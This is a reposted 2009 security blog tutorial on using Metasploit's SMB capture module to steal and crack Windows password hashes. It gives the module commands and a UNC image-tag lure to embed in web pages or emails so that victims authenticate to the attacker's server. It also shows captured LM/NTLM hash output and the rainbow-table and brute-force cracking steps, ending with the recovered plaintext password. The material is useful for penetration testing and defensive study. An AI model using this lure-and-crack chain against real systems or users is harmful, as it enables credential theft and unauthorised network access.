Using the Metasploit SMB Sniffer Module

admin | Apr 06, 2009 | Comments 0

From the Carnal0wnage blog

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I’ll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn’t matter what system, just not the same system. (I’ll try to cover this in another blog post soon)

Additionally, the SMB Relay module provides a random challenge for each attempt and doesn’t log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.

For background it looks like this which looks just like the one that will work :-(

[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

So what are we to do? Use the SMB Sniffer module of course!

The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info

Name: Authentication Capture: SMB
Version: 5966

Provided by: hdm

Description:
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

We need to force a victim to authenticate to metasploit. The easiest way is to embed a UNC link into a webpage or email.

Example: img src="\\networkIP\share\1.gif"

Once the victim’s browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You’ll notice the difference between this module and SMB Relay which issues a random challenge making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module, if you want to try to get a shell use the smb_relay exploit module.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1

We can now use HALFLM rainbow tables with the 112233455667788 challenge to crack the first half of the password.

**We only take the first 16 characters of the LM password

LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d

We can then use rainbow tables to crack the first half:

$ ./rcracki *.rti -h 76365e2d142b5612
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
reading...
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52

You will have to guess or bruteforce the rest :-( but thankfully there is a tool in your metasploit tools directory to help you do just that!

$ ruby halflm_second.rb

Usage: halflm_second.rb

OPTIONS:

-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7

$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD

Feel free to share:
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Furl
  • LinkedIn
  • StumbleUpon
  • Technorati
  • TwitThis
  • Digg
  • MySpace
  • Ping.fm
  • Slashdot

Filed Under: Tech

Tags:

About the Author: I am the I.T. Director and Information Security Officer for an ecommerce / production company. I'm also a graphic designer; musician; martial arts instructor; pilot and all around creative genius.

RSSComments (0)

Trackback URL

Leave a Reply

You must be logged in to post a comment.